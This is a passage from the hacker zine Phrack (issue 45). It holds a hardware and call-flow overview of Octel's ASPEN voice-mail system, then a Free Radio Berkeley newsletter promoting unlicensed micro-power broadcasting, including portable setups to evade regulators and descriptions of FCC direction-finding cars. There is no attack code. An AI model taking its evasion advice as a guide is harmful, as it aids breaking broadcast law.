  16088. M%Z@7$!AP&-@8.!EY&;H9[QDD&ED:MAH2&RL;1!M=&W8;CQNI&P$<3Q]@'W$?
  16089. M@!^H'](?W!\&()@@'B%?(3`B02)2(F,B="+I(@0C%R,;)`$I&RH0+!$S+#-"
  16090. A,V$S````````````````````````````````````````
  16091. `
  16092. end
  16093.                               ==Phrack Magazine==
  16094.  
  16095.                  Volume Five, Issue Forty-Five, File 23 of 28
  16096.  
  16097. ****************************************************************************
  16098.  
  16099.                            AN INTRODUCTION TO OCTELS
  16100.                       AUTOMATIC SPEECH EXCHANGE NETWORK
  16101.                                 BY OPTIK NERVE
  16102.                               (nerve@netaxs.com)
  16103.  
  16104.  
  16105. The Automatic SPeech Exchange Network, or ASPEN for short, is a high
  16106. performance voice processing system which interfaces and integrates with a
  16107. variety of PBX and Central Office (CO) equipment. Interfaced systems require
  16108. the caller to enter an extension, while integration provides a personal
  16109. greeting automatically. Both of these provide the ability to return to the
  16110. operator if necessary. ASPEN systems offer voice mail, Information Center
  16111. Mail-Boxes (ICMB), Enhanced Call Processing (ECP), networking, and
  16112. transaction processing. The Aspen, Branch, Branch XP, and VPC 100 hardware
  16113. is only significantly different in their port and drive capacities. The
  16114. following information is presented to introduce an overview of the hardware
  16115. in an ASPEN system, and its function for it as a whole. This is not a
  16116. "how-to" file and you will not find anything related to fraud in this
  16117. article.
  16118.  
  16119.  
  16120. SYSTEM COMPONENTS LIST
  16121. -=-=-=-=-=-=-=-=-=-=-=-
  16122.  
  16123. Each ASPEN system contains the main cardcage, the I/O cardcage, the drives,
  16124. power supplies, and the system manager terminal. The system manager printer
  16125. is optional. ASPEN hardware consists of:
  16126.  
  16127.     o  CPU Board
  16128.     o  File card
  16129.     o  Line board
  16130.     o  Telephone Interface Card (TIC)
  16131.     o  Scanner board
  16132.     o  Winchester drives
  16133.     o  Power supplies
  16134.     o  System manager terminal
  16135.     o  System manager printer (optional)
  16136.  
  16137. The cardcages of the system contain the following boards, each identifiable
  16138. by a unique color coded tab indicating the slot into which the board fits.
  16139.  
  16140.  MAIN CARDCAGE
  16141.  
  16142.     o  CPU (yellow)
  16143.     o  File card (dark green)
  16144.     o  Line boards (light green)
  16145.  
  16146.  INPUT/OUTPUT CARDCAGE
  16147.  
  16148.     o  Scanner board (pink)
  16149.     o  TICs (purple)
  16150.  
  16151.  
  16152. SYSTEM COMPONENTS OVERVIEW
  16153. -=-=-=-=-=-=-=-=-=-=-=-=-=-
  16154.  
  16155. The following subsections present a functional description of the
  16156. characteristics considered standard on ASPEN system hardware.
  16157.  
  16158.  
  16159. CENTRAL PROCESSING UNIT
  16160. ~~~~~~~~~~~~~~~~~~~~~~~
  16161. The CPU board contains a microprocessor with access to one megabyte of
  16162. RAM. It is identical, in function, to a personal computers' CPU,
  16163. executing instructions, and controlling serial I/O to the scanner board
  16164. and system manager terminal.
  16165.  
  16166. SYSTEM DATA BUSES
  16167. ~~~~~~~~~~~~~~~~~
  16168. System communication between the boards uses three main buses: the control
  16169. bus, the data bus, and the polling/status bus. The eight megahertz control bus
  16170. works on a request/response procotol; for each 16 byte message sent by the
  16171. CPU to a board, a 16 byte response must be sent back to the CPU. The data bus
  16172. moves large amounts of data (20KB transfers) between the CPU, file card, and
  16173. line boards at eight megahertz. All digitized speech to and from the line
  16174. boards and file card travel on this bus. The polling/status control bus is
  16175. used only between the scanner board and TICs. The scanner board polls each TIC
  16176. port for an on-hook/off-hook status every ten milliseconds.
  16177.  
  16178. FILE CARD
  16179. ~~~~~~~~~
  16180. The file card controls the drives and is the primary system file manager.
  16181. The file card controls the Winchester ST-506 interface. The file card also
  16182. stores frequently used prompts of less than three seconds in a speech cache
  16183. memory.
  16184.  
  16185. LINE BOARD
  16186. ~~~~~~~~~~
  16187. The line board contains microprocessors with access to 128KB of RAM. The
  16188. line board has four channels, each matching a channel on a TIC. The Aspen may
  16189. contain as many as six line boards, but this is limited to four, and even
  16190. two on lower end Aspen models. Line boards perform several important
  16191. functions including: encoding and decoding of digitized speech, tone
  16192. detection, DTMF detection, silence detection, speed control, and DTMF tone
  16193. generation. Speech is encoded at a rate of 25K samples per second using Delta
  16194. modulation. Each of the four channels on the line board has a tone detection
  16195. circuit, which detects dial, busy, reorder, and ringback tones generated by
  16196. most PBXs and COs. The proprietary design limits talk-off during message
  16197. playback.  Talk-off may occur when the voice generates tones similar to DTMF
  16198. tones.  Silence detection recognizes spaces between words so that the voice
  16199. message can be compressed for disk storage, optimizing disk space. The
  16200. system also recognizes silence during message recording and prompts the user
  16201. to continue.  The line board controls message playback speed without
  16202. affecting voice frequency pitch by controlling the amount of silence
  16203. between words.  Playback can be normal, slow, or fast. The line board is
  16204. equipped with a tone generator used for dialing when ASPEN places an
  16205. outcall or transfers a call.
  16206.  
  16207. TELEPHONE INTERFACE CARDS
  16208. ~~~~~~~~~~~~~~~~~~~~~~~~~
  16209. The Telephone Interface Cards (TICs) provide interfaces to either the
  16210. Public Switched Telephone Network (PSTN) including CO, or to a PBX. In
  16211. most installations, the TIC emulates a regular telephone to the PBX or the
  16212. CO.  Octel Communications has special TICs that emulate electronic digital
  16213. sets in a Mitel PBX and ROLM PBX. The four channels on a TIC connect
  16214. directly to the four channels on a line board. The TICs use transformers to
  16215. provide electrical isolation to protect the line board and the network or PBX.
  16216. The TICs communicate with the scanner board through the polling/status
  16217. control bus located on the I/O backplane.
  16218.  
  16219. SCANNER BOARD
  16220. ~~~~~~~~~~~~~
  16221. The scanner board, as mentioned above,  communicates with all TICs through
  16222. the polling/status control bus. By continually polling all TIC channels, the
  16223. scanner board detects new incoming calls and reports this change in status
  16224. information to the CPU board though one of the four serial I/O ports. It also
  16225. provides RS-232 data connection to the PBX when required, and the serial I/O
  16226. port which interfaces the system managers terminal with the CPU. The scanner
  16227. board includes a built in modem used to remotely access the system
  16228. administration functions. The local system manager terminal and the modem
  16229. circuit share the same serial I/O port, and the first connection has priority
  16230. over the second. (ie: If the modem is connected, the local system manager
  16231. terminal cannot access the system)
  16232.  
  16233. SYSTEM MANAGER TERMINAL/PRINTER
  16234. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  16235. The system manager terminal is used to enter and change information within
  16236. the system database. The system manager terminal is a Wyse 50 terminal
  16237. used by ASPEN to report administrative information. The printer is an
  16238. optional device used to produce a hard copy of output produced.
  16239.  
  16240. DISK COMMUNICATOR
  16241. ~~~~~~~~~~~~~~~~~
  16242. The Disk Communicator provides connections between the file card and the
  16243. drives. If more than four drives are installed, a multiplexer (MUX)
  16244. communicator board selects the four drives in the first cabinet and the
  16245. four drives in the second cabinet.
  16246.  
  16247. WINCHESTER DRIVES
  16248. ~~~~~~~~~~~~~~~~~
  16249. These drives store system software, mailboxes, voice prompts, messages, and
  16250. greetings. Octel Communications uses its own formatting technique and disk
  16251. controllers. Standard drives are formatted for a capacity of 60, 90, or 190
  16252. megabytes. The drives (0-1) contains all software and voice prompts needed to
  16253. operate the system.
  16254.  
  16255. POWER SUPPLY
  16256. ~~~~~~~~~~~~
  16257. The ASPEN power supply is located in the center of the system housed in a
  16258. single case, which actually contains two supplies. One supplies +5/-5 and
  16259. +12/-12 volts to the boards, while the other provides +12 volts for the
  16260. drive motors. There are no replaceable fuses in an ASPEN system. If the
  16261. current draw or input voltage reaches a defined level, the power supply
  16262. turns itself off automatically, necessitating a reset of a single circuit
  16263. breaker.
  16264.  
  16265. SPECIAL INTEGRATION DEVICES
  16266. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  16267. The Woobox and the PBX Integration Device (PID) provide integration to
  16268. different PBXs. These devices stand alone and are peripheral to the ASPEN
  16269. chassis. ASPEN integrates with the AT&T Systems 75 and 85 using an A/PID.
  16270.  
  16271.  
  16272. THE CALL PROCESS
  16273. -=-=-=-=-=-=-=-=-
  16274.  
  16275. The following is a general description of a typical call through ASPEN and
  16276. the boards involved in the process:
  16277.  
  16278.   o  Subscriber dials the ASPEN pilot number, either directly or is
  16279.      forwarded to APSEN by the PBX.
  16280.   o  A TIC senses ring voltage and raises a flag to indicate an
  16281.      incoming call.
  16282.   o  The scanner board polls all TICs for change of status using the
  16283.      polling/status control bus and detects the raised flag.
  16284.   o  The scanner board commands the TIC to answer the call (go off-hook)
  16285.      by sending a command on the polling/status control bus
  16286.   o  The scanner board alerts the CPU board of an incoming call
  16287.      by sending port identification information over the serial
  16288.      I/O port.
  16289.   o  The CPU commands the corresponding port on the line board to
  16290.      begin listening for DTMF tones, silence, or dial tone. The line
  16291.      board informs the CPU of call process through the control bus.
  16292.   o  The CPU commands the file card to send digitized voice prompts,
  16293.      "Hello, this is ASPEN...", over the data bus to the proper
  16294.      port on the line board. The line board converts these prompts
  16295.      to analog and passes them to the TIC
  16296.   o  The caller dials the desired destination number through DTMF.
  16297.      The line board interprets these and passes the information
  16298.      to the CPU.
  16299.   o  The CPU instructs the file card to find the user record of the called
  16300.      party, check for the location of the personal greeting, retrieve the
  16301.      greeting, and pass it to the line board. The line board converts the
  16302.      greeting to analog and passes it to the TIC
  16303.   o  After the greeting plays, the caller records a message. The line board
  16304.      digitizes speech and stores it in buffers of six seconds each (20KB)
  16305.   o  Using the control bus, the CPU sets a data bus transfer between the line
  16306.      board and file card. The file card decides which drive has the most free
  16307.      space and where to wire this message. The six seconds of digitized speech
  16308.      is transferred from the line board to the file card. The file card then
  16309.      writes the six second segment to the disk. This process continues until
  16310.      the caller finishes the message.
  16311.   o  The file card updates the user record of the called party by placing 11
  16312.      bytes in the mailbox. The 11 bytes define the message location on the
  16313.      disk, sender, time, priority, and length.
  16314.   o  The caller terminates the call by pressing the one key
  16315.   o  The line board informs the CPU through the control bus that the call has
  16316.      been terminated
  16317.   o  The CPU commands the file card to send the good-bye prompt to the line
  16318.      board which converts it to analog and passes it to the TIC
  16319.   o  The CPU commands the scanner board to disconnect that port
  16320.   o  The scanner board commands the TIC to hang-up (go on-hook) through the
  16321.      polling/status control bus
  16322.   o  The scanner board continues polling all TIC ports for change of status
  16323.  
  16324.  
  16325. CONCLUSION
  16326. -=-=-=-=-=-
  16327.  
  16328. I hope this information provides you with a more solid background of
  16329. how the ASPEN system functions. The basic aspects of this system can also
  16330. apply to other similar PBX interfaces. Although the above information
  16331. cannot really be used for anything illegal, I have provided it, for
  16332. informational purposes, to those who "feed" on telco-bits as I do.
  16333.  
  16334. Greets go out to: Ludichrist, Squarewave, the ID-Crew,
  16335.                   #hack, and #phreak
  16336.  
  16337. You can reach me at nerve@netaxs.com, but please use my following
  16338. public key to encrypt all mail before sending it. Thank you...
  16339.  
  16340.  
  16341. -----BEGIN PGP PUBLIC KEY BLOCK-----
  16342. Version: 2.3
  16343.  
  16344. mQCNAizV9xMAAAEEALvTChdFrhZvZ9wqJI8q7v0cEUdnjGBmoFGLzIWb1I8G9ZWA
  16345. 8rDmxxeU5NBtJ7uK4Ea74MCNL35TGEnuoRQNZl5af9iJDfJjs/LVKNCWwWrPRMUi
  16346. 6gPO6ui1bSfnvQn1ykZ2wj9fVwek9Is4Lneh1vOfpVMZPlTNRN23FvWw7yeVAAUT
  16347. tB5PcHRpayBOZXJ2ZSA8bmVydmVAbmV0YXhzLmNvbT4=
  16348. =K44O
  16349. -----END PGP PUBLIC KEY BLOCK-----
  16350.                               ==Phrack Magazine==
  16351.  
  16352.                  Volume Five, Issue Forty-Five, File 24 of 28
  16353.  
  16354. ****************************************************************************
  16355.  
  16356. [The following is a message we received from Radio Free Berkeley
  16357.  regarding their movement and radio kits.  I think these guys
  16358.  have a great thing going, and I personally am taking measures
  16359.  to get involved, (in my own special way.)  Now Austin FCC, don't
  16360.  get your sphincters in a tizzy, because you won't be fining me
  16361.  anytime soon, but you never know who that broadcaster is, now do
  16362.  you?]
  16363.  
  16364. ------------------------------------------------------------------------------
  16365.  
  16366. Chris,
  16367.  
  16368. I have enclosed the most current newsletter from FRB is this email.
  16369. Mondo 2000 just came out and has a 14 page article on Guerilla media with
  16370. a lot of information about FRB and others.  We are trying to encourage as
  16371. many people as possible to obtain transmitters and take to the air
  16372. waves.  If this happens, it will be very difficult for the FCC to do very
  16373. much, especially in areas of the country where the nearest FCC office is
  16374. 500 to 1000 miles away.  It is extremely important that the stranglehold
  16375. on the free flow of ideas, information, art and culture be broken not
  16376. only here but around the world as well.  China has just clamped down on
  16377. broadcasting there, only state approved outlets and all satellite dishes
  16378. have been banned was well.  We intend on putting an international
  16379. shortwave station on the air, first broadcast will be New Years Eve.  It
  16380. will be a call for no borders, tear down the walls and party down.  We hope
  16381. to get people in the Bay Area who are in exile from their home countries
  16382. for political activity to do 10 to 20 minutes programs in their
  16383. native language which we will broadcast around the world on the 20 meter
  16384. band.  Needless to say, the FEDS and their corporate masters are going to
  16385. take a rather dim view of all this.  Their armies and police can not be
  16386. everywhere at once, however.
  16387.  
  16388. Anyway, good to hear from you.  Let me know if you need further information.
  16389.  
  16390. Stephen Dunifer
  16391. Free Radio Berkeley
  16392.  
  16393.  
  16394. -------------------------
  16395.  
  16396.                           RECLAIMING THE AIRWAVES
  16397. Published by Free Radio Berkeley & Free Communications Coalition
  16398. October 1993
  16399.  
  16400. New Email Address: FRBSPD@CRL.COM
  16401.  
  16402. Submissions encouraged and welcomed
  16403.  
  16404. ---------------------------------------------------------------------------
  16405.  
  16406.                ***** FCC Uses 20 SF Cops to Obtain ID *****
  16407.  
  16408.      In a scene resembling a French noir film, one person associated with
  16409. San Francisco Liberation Radio was detained by 20 SF police officers until
  16410. his ID could be presented to FCC agent David Doon.  At approximately 9:30
  16411. PM on Wednesday, September 22, Richard Edmondson was approached by David
  16412. Doon who asked for identification.   After refusing to produce
  16413. identification and answer any questions,  Richard drove away and was
  16414. stopped on Webster St. by SF police officers who blocked off the entire
  16415. northbound lane of the street with 8 vehicles.  A confused scene ensued
  16416. wherein the police officers had virtually no idea of what was going on or
  16417. why they such massive backup had been called.  Richard was ordered to get
  16418. out of his vehicle with his hands up and in clear sight by clearly agitated
  16419. SF police who subsequently handcuffed him.  SF police officers were heard
  16420. to say "who is this guy" and "what do we have him for" - for several
  16421. minutes these questions went unanswered.  By the time the FCC agent arrived
  16422. to examine Richard's ID there were at least 20 SF police officers on the
  16423. scene.  After learning of what was going on some of the officers were
  16424. clearly exasperated at having their time wasted by this FCC agent.  A few
  16425. were amused and asked for information regarding San Francisco Liberation
  16426. Radio's frequency and broadcast schedule.  After Richard's ID was verified
  16427. he was released without any further consequences by the SF police.
  16428.      Richard described it this way, "Before it was all over there were at
  16429. least 20 police officers on the scene.  They were all so pumped up with
  16430. adrenaline you would have thought I had committed the crime of the century.
  16431. It was clearly irresponsible for this FCC agent to call for such a massive
  16432. response without giving clear reason or instruction to the SF police.  When
  16433. police officers go into a situation not knowing the details they naturally
  16434. assume the worst.  For one dark moment I feared my life was in danger."
  16435.      Clearly, this was an obvious case of overreaction by FCC agent David
  16436. Doon who clearly endangered the life of Richard Edmondson by calling in
  16437. such a massive police response.  The FCC must be held accountable for the
  16438. actions of their agents who use such extremely excessive and reactionary
  16439. methods to suppress a growing micro power broadcasting movement.  It would
  16440. have sufficed for David Doon to have written down the license plate # of
  16441. Richard's vehicle and run a DMV check.  As more micro power broadcasters go
  16442. on the air in the Bay area and Northern California we can anticipate
  16443. further actions by the FCC to harass and intimidate those involved.
  16444. However, we shall not be moved by their threats and police state tactics.
  16445.  
  16446. --------------------------------------------------------------------------
  16447.  
  16448.            ***** BUSH RADIO UNDER ATTACK IN SOUTH AFRICA  *****
  16449.  
  16450. 4 October, 1993
  16451.  
  16452. AMARC Solidarity Action Network received this urgent demand today
  16453. from Bush Radio, a community radio project in Cape Town, South
  16454. Africa.
  16455.  
  16456. An Action Alert was first issued in support of Bush Radio when its
  16457. equipment was seized in May. For a copy of that Alert, send a request
  16458. to amarc@web.apc.org.30th September, 1993
  16459.  
  16460. OPEN LETTER RE:  PROSECUTION OF BUSH RADIO
  16461.  
  16462. To Bush Radio's Members, Users Friends and Supporters
  16463.  
  16464. Bush Radio is being prosecuted for starting a community radio
  16465. station. We are charged on three counts:
  16466.      1.   illegal broadcasting
  16467.      2.   illegal possession of broadcast apparatus, and
  16468.      3.   obstructing the course of justice.
  16469.  
  16470. These charges are being leveled at two of our members, who face
  16471. stiff penalties: R10,000 and/or 3 years imprisonment each on the
  16472. first two counts alone.
  16473.  
  16474. The first court appearance is set for October 13. We now need
  16475. your support to stop the victimization of genuine community radio
  16476. before it even gets going.
  16477.  
  16478. Bush radio is a community radio initiative, owned and controlled
  16479. by its membership, a wide range of organizations and individuals.
  16480. For more than two years we planned and talked about going on air.
  16481. Our attempts to get a broadcasting license from the Ministry for
  16482. Home Affairs were repeatedly frustrated, and our membership
  16483. eventually decided that we should go ahead without one.
  16484.  
  16485. So from 4 - 8 pm on Sunday April 1993, listeners on the Cape
  16486. Flats heard a mix of programs produced and presented by our
  16487. "networkers" (volunteer producers from the community). Scores of
  16488. other people were there, and all of them had a chance to go on
  16489. air, most of them for the first time in their lives.
  16490.  
  16491. In the week that followed the state seized our transmission
  16492. equipment, effectively silencing us on the eve of our second
  16493. broadcast, scheduled for May 1st. About six weeks later we were
  16494. warned that the state was considering laying charges against us.
  16495. Last week charge sheets were served on our lawyers, to appear
  16496. before a regional court on October 13th.
  16497.  
  16498. For the state to take such action at this time seems to
  16499. contradict their professed commitment to a more open South
  16500. Africa. We are being charged in terms of laws inspired by
  16501. apartheid at the very same time that new legislation passes
  16502. through parliament - including bills for the transitional
  16503. Executive Council and an Independent Broadcasting Authority,
  16504. drawn up by parties at the negotiations.
  16505.  
  16506. The enforcement of these charges could have serious consequences
  16507. for us at Bush Radio. For an organization which employs a staff
  16508. of only two people, we do a disproportionate amount of work, and
  16509. can ill afford to be spending time on defending unnecessary legal
  16510. action. Bush Radio runs a range of training programs aimed at
  16511. bringing new voices into the broadcasting environment. We work
  16512. with a number of organizations, producing programs that are
  16513. distributed either on audio-cassette or on other radio stations.
  16514. Substantial time and energy is invested in building up a network
  16515. of volunteers, the backbone of a truly participatory community
  16516. radio. A lot of time is spent providing support to others who
  16517. want to start radio stations in their own communities.
  16518.  
  16519. Despite our modest resources, Bush radio has become something of
  16520. a "flagship" for the emerging community radio sector in SouthAfrica.
  16521. For us to be criminalized could weaken the growth of this
  16522. new sector which holds such real potential for communities
  16523. wanting to control their own development.
  16524.  
  16525. We were always open and peaceful in our methods, and feel that
  16526. this treatment is misplaced. To drag us through the courts is a
  16527. waste of time and money, not only for Bush Radio but also for the
  16528. taxpayer who foots the bill.
  16529.  
  16530. We hope the charges might be dropped, and seek your support in
  16531. making our case. What can you do?
  16532.  
  16533. At this stage we ask that you write letters. They should be:
  16534.      "To whom it may concern,"
  16535.  
  16536. The content of your letter would depend on your relationship with
  16537. Bush Radio.
  16538.  
  16539. If you are a member, we'd like you to say why you think it's
  16540. inappropriate for us to be prosecuted, and include a statement of
  16541. solidarity.
  16542.  
  16543. If you are a client, we'd like you to say why you think it's
  16544. inappropriate for us to be prosecuted, and include a statement of
  16545. solidarity.
  16546.  
  16547. If you are a client, we'd like to hear about the value of service
  16548. you have derived from Bush Radio, and we would like you to be
  16549. specific about what we did together.
  16550.  
  16551. If you are a friend, or supporter, please write whatever you feel
  16552. is appropriate, and we'd appreciate comments on how this kind of
  16553. action undermines confidence in the nature of change in our
  16554. country.
  16555.  
  16556. Please send these letters to:
  16557.                      BUSH RADIO at fax no.:
  16558.                         +(27-21) 448-5451
  16559.  
  16560.                      and send originals to:
  16561.                          P.O. Box 13290
  16562.                          Mowbray, 7705
  16563.                     Cape Town, South Africa
  16564.  
  16565. We should receive these letters by Friday 8th October, or as soon
  16566. as possible thereafter.
  16567.  
  16568. Thanking you in anticipation,
  16569.  
  16570. JEANNE DU TOIT
  16571. Secretary for the Coordinating Committee
  16572.  
  16573.  
  16574.    The Solidarity Action Network is an initiative of AMARC,
  16575.     the World Association of Community Radio Broadcasters.
  16576.  
  16577.    Action Alerts are posted in the conference amarc.radio
  16578.         carried by many members of the APC Network.
  16579.  
  16580.     Email users who do not have access to the APC Network
  16581.    can receive Action Alerts directly by contacting AMARC.
  16582.  
  16583.         For more information about AMARC or the
  16584.            Action Network, contact us at:
  16585.  
  16586.  3575 St-Laurent, # 704 - Montreal, Quebec - H2X 2T7  Canada
  16587.          Fax: +(514) 849-7129 - Tel: +(514) 982-0351
  16588.                    Email: amarc@web.apc.org
  16589.  
  16590. ---------------------------------------------------------------------------
  16591.  
  16592.  
  16593.                    ***** FREEDOM OF COMMUNICATION *****
  16594.  
  16595.  
  16596. >From Zeke Teflon's book - Complete Manual of Pirate Radio
  16597.  
  16598.      Freedom of communication is a basic human right. Like all rights,
  16599. freedom of communication consists of being able to exercise your
  16600. abilities with- out interference. Government cannot give you your
  16601. abilities, but it sure as hell can (and will) interfere with you when
  16602. you exercise them. Government cannot give you rights. It can only
  16603. take them from you. If all governments (goons with guns forcing others
  16604. to follow their dictates through violence and coercion) were to
  16605. cease to exist, human rights would certainly not cease along with
  16606. them.
  16607.  
  16608.      The naive objection could be raised that while governments cannot
  16609. give you rights, they can protect them by preventing your fellow citizens
  16610. from interfering with you. That's the theory. In practice, governments
  16611. rarely 'protect' citizens' rights, and then only when it suits their
  16612. political purposes. Invariably, when governments feel the least
  16613. bit threatened, they place their own 'security' needs above the human
  16614. rights they supposedly safeguard. Through- out history the vilest
  16615. and most consistent violators of human rights have been governments.
  16616. Governments, along with their bedfellows, organized religions, have
  16617. been responsible for the overwhelming bulk of human rights violations
  16618. in every human civilization.
  16619.  
  16620.      We cannot look to government to protect our rights. We have to do
  16621. it ourselves, and an effective means of doing that is by exercising
  16622. our rights. Use 'em or lose 'em.
  16623.  
  16624. ---------------------------------------------------------------------------
  16625.  
  16626.                      ***** Connecting to the Net *****
  16627.  
  16628.      One of the best tools for the immediate transfer of news, information
  16629. and discussion is the Internet.  With any basic computer and a modem, world
  16630. wide access is just a few keystrokes away.  In the Bay Area one of the best
  16631. Interest access providers is CRL, for a flat rate of $18 per month you will
  16632. have all the Interent resources available to you.  Resources include the
  16633. ability to send email to anyone else in the world who is on the net as
  16634. well, check out hundreds of news groups for the latest and weirdest
  16635. happenings, send breaking news and information to other community
  16636. broadcasters, etc.
  16637.      At the moment we are working on a way to digitally record and compress
  16638. 5 to 15 minute audio spots into a computer file which can be sent anywhere
  16639. in the world where there is a computer to receive it.  With an inexpensive
  16640. digital recording and playback card which plugs into any basic PC system,
  16641. micro power broadcasters will be able to send and receive these spots to
  16642. and from anywhere in the world.  This completely bypasses the rather
  16643. expensive satellite feeds and makes for a much more decentralized system of
  16644. distribution.  If you are interested in this project please contact us.
  16645. To reach CRL in regards to an Internet account give them a call (415) 381-
  16646. 2800.
  16647. --------------------------------------------------------------------------
  16648.  
  16649.       ***** MICRO POWER BROADCASTING, TECHNOLOGY FOR THE PEOPLE *****
  16650.  
  16651.      With circuit board dimensions of 2" x  4 1/2", a five
  16652. watt FM micro power transmitter is capable of covering a community
  16653. 3-5 miles in radius.  Such compact and inexpensive technology has
  16654. the possibility of giving each and every community its own voice.  Stephen
  16655. Dunifer with Free Radio Berkeley has been designing and developing
  16656. this unit along with a series of other transmitters, amplifiers and
  16657. antennas over the last year.  Mass produced RF transistors and
  16658. communications IC's have made it possible to design and build stable and
  16659. clean transmitters and amplifiers for a fraction of the cost of brand name
  16660. type accepted equipment.  Even the entry level 5 watt kit, using only three
  16661. transistors, is very stable once tuned and set up.
  16662.      Even more sophisticated phase lock loop (PLL) frequency
  16663. control designs are not that much more expensive to design and produce.  At
  16664. this moment, several individuals are working on low cost PLL designs
  16665. which should meet current FCC requirements for frequency stability.  When
  16666. these designs are finished they will be available in kit form and
  16667. assembled as well (for shipment outside US only).
  16668.      What does it take to put a micro power broadcasting operation
  16669. on the air ?  First off, less than $500.  A basic 5 watt FM transmitter,
  16670. output filter (very necessary to reduce output harmonics), coax cable
  16671. (50-100 ft RG8), antenna and power supply (battery or 12 volt regulated
  16672. and filtered unit) is going to cost about $125-150.  This is assuming
  16673. assembly of kit and antenna.  Next, a VHF power meter ($30-$40 at
  16674. Radio Shack), a dummy load (make from resistors or $19 at Radio Shack)
  16675. and a frequency counter ($50-150) are needed for tuning and keeping
  16676. things optimized.  Beyond those requirements one sort of audio source
  16677. (line level -10 dbm, .3 volts) or another is needed to feed the
  16678. transmitter.  This source can be a walkman type cassette unit, a mixing
  16679. board, tape deck, etc.  Granted this is not a professional studio but for
  16680. low budget community operations, it does not take top end gear.  Creativity
  16681. and determination as shown by many community stations can certainly make
  16682. up the difference.
  16683.      Once all the equipment has been assembled and arranged,
  16684. a suitable place needs to be found for the operation and setting up
  16685. the antenna.  With FM, which is line of sight transmission, the higher
  16686. the antenna the better.  Depending on the regulations and political
  16687. climate of the country in which you live, your operation may need
  16688. to be portable for rapid set-up and break down.  That seems especially
  16689. true here in the United Corporate Snakes of America.
  16690.      At the core of this is the potential to set up loosely
  16691. coupled autonomous networks of communication around entire planet,
  16692. outside the grasp of corporate/government control.  This is the goal
  16693. of the Free Communications Coalition, the umbrella organization which
  16694. is being formed to support, defend and encourage micro power broadcasting.
  16695.      Micro power technology makes this possible through a
  16696. combination of low power. inexpensive FM, AM, TV and shortwave
  16697. transmitters.  Free Radio Berkeley, San Francisco Liberation Radio and
  16698. other interested parties will be placing an international shortwave station
  16699. on the air (100-300 watts initially at 40 meters -  7.4 to 7.5 Mhz range,
  16700. increasing to 1000) sometime in November, 1993.  If we had to use
  16701. tube designs, doing such an operation would be impossible due to the
  16702. portability requirements.  Instead, relatively inexpensive transistor
  16703. designs allow to us build linear shortwave amplifiers capable of output
  16704. powers exceeding 1000 watts while running off a bank of lead acid
  16705. batteries.  Certainly, within the normal definitions, 100 to 1000
  16706. watts on shortwave is definitely beyond the usual micropower definition.
  16707. However, when right wing evangelical ranters are running 100-500 KW it
  16708. could be considered to be micropower. At the moment, Free Radio Berkeley is
  16709. offering an entire line of transmitter and amplifier kits for FM
  16710. broadcasting along with antenna and equipment designs.  Assembled
  16711. units are available for sale outside the US only.  A rather effective
  16712. antenna can be built using common hardware store parts for about $10.  Our
  16713. work will be expanding to include UHF & VHF TV, AM and shortwave designs.
  16714.      We would like to find other engineers and technically
  16715. inclined people to help increase these efforts since we are a rather
  16716. small design and development operation.  Further, we need such technically
  16717. inclined people to act as advisors and facilitators in the process
  16718. of helping people build, test, tune, and setup their transmitters
  16719. and antennas.  That way, we can create a pool of people across the
  16720. country and world who will be available to lend a technical hand to
  16721. those who wish put micropower broadcasting operations on the air.
  16722.  
  16723. Let a thousand transmitters bloom
  16724.  
  16725. Stephen Dunifer
  16726. Free Radio Berkeley / Free Communications Coalition - the People's FCC
  16727.  
  16728.  
  16729. ---------------------------------------------------------------------------
  16730.  
  16731.                      Freedom of Broadcasting in Italy
  16732.  
  16733.      Just for you to know, back in 1974/75 Radio Milano International in
  16734. Milano (not associated with us) started as the first private-pirate
  16735. FM station in this country, operating from a van which kept moving
  16736. around the town to avoid the PTT authorities (equivalent of the FCC).
  16737. RMI brought the first regular stereo programs to Italy, good music
  16738. not heard before on state channels, as the other stations which came
  16739. after them did. They also went to court and fought for "free", private
  16740. radio and freedom of speech over radio and won against the old Postal
  16741. law which considered broadcasting as State Monopoly. Today RMI is
  16742. one of the major national radio networks with hundreds of repeaters
  16743. all over the Italian peninsula, while thousands of private radio and
  16744. TV stations obtained authorizations to broadcast legally over the
  16745. years.
  16746.      If you have a story to tell on pirate radio, or information to share
  16747. (voice/paper/email), please get in touch with us. On shortwave we reach
  16748. also many European Pirates who would love to hear from you. (We indeed
  16749. carried "legally" some of the pirates programs in the past in order
  16750. to offer them better coverage to their "alternative" programs. Something
  16751. we would also like to do again the future.)
  16752.  
  16753. Please send email to 100020.1013@compuserve.com, including a phone
  16754. number and times when we can call possibly you from Europe for an
  16755. interview. We will guarantee anonymity if so desired, since our Shortwave
  16756. transmissions may also be heard in the USA. We'll love to hear from
  16757. you! 73, Alfredo --- Alfredo E. Cotroneo, President, NEXUS-International
  16758. Broadcasting Association PO BOX 10980, I-20110 Milano, Italy phone:
  16759. +39-2-266 6971 | fax: +39-2-706 38151
  16760.  
  16761. ---------------------------------------------------------------------------
  16762.  
  16763. Notes from the Net on the FCC
  16764.  
  16765. One person writes about his FCC bust on the Usenet newsgroup
  16766. alt.radio.pirate:
  16767.  
  16768. When I was busted in 1984, the FCC used a tan-colored
  16769. buick passenger car.  The passenger seat had been ripped out and was
  16770. replaced with a rack of receiving equipment--nothing special, just
  16771. commercially-available stuff.  In the trunk was a pair of batteries
  16772. driving inverters.  The engine had a second alternator to charge the
  16773. batteries.  Beneath the vinyl roof was a direction-finding antenna
  16774. array that was connected to an indicator on the dashboard.  They'd
  16775. just drive in the direction indicated until they reached the transmitter.
  16776.      That car served 3-4 states in the Northwestern US.  How
  16777. do I know all this?  After the guy finished writing me up, I asked
  16778. him to show me his equipment.  After all, I showed him mine.  He started
  16779. to say no, but then changed his mind since there was nothing secret
  16780. involved.
  16781.  
  16782. Don Hackler responds:
  16783.  
  16784.      When I was engineering an directional AM broadcast station,
  16785. the station was inspected by two FCC engineers driving a similar car.
  16786. The roof had been removed and replaced with a fiber glass replica
  16787. of the original.  The antennae were embedded in the new roof, and
  16788. there were no indications of anything `special' about the roof, inside
  16789. or out.
  16790.      I was given a ride in the car to go check some of the
  16791. monitor points with a field-strength meter.  The passenger bucket
  16792. seat had been replaced by a 3 foot tall rack on a swivel mount, so
  16793. the driver or a passenger in back could operate the equipment.  The
  16794. rack had a slip cover made of upholstery vinyl that matched the car's
  16795. interior.  They refused (nicely) to let me see the equipment, but
  16796. said it was just standard equipment; i.e. a spectrum analyzer and
  16797. some general coverage receivers.
  16798.      I never understood why they didn't allow a peek, but
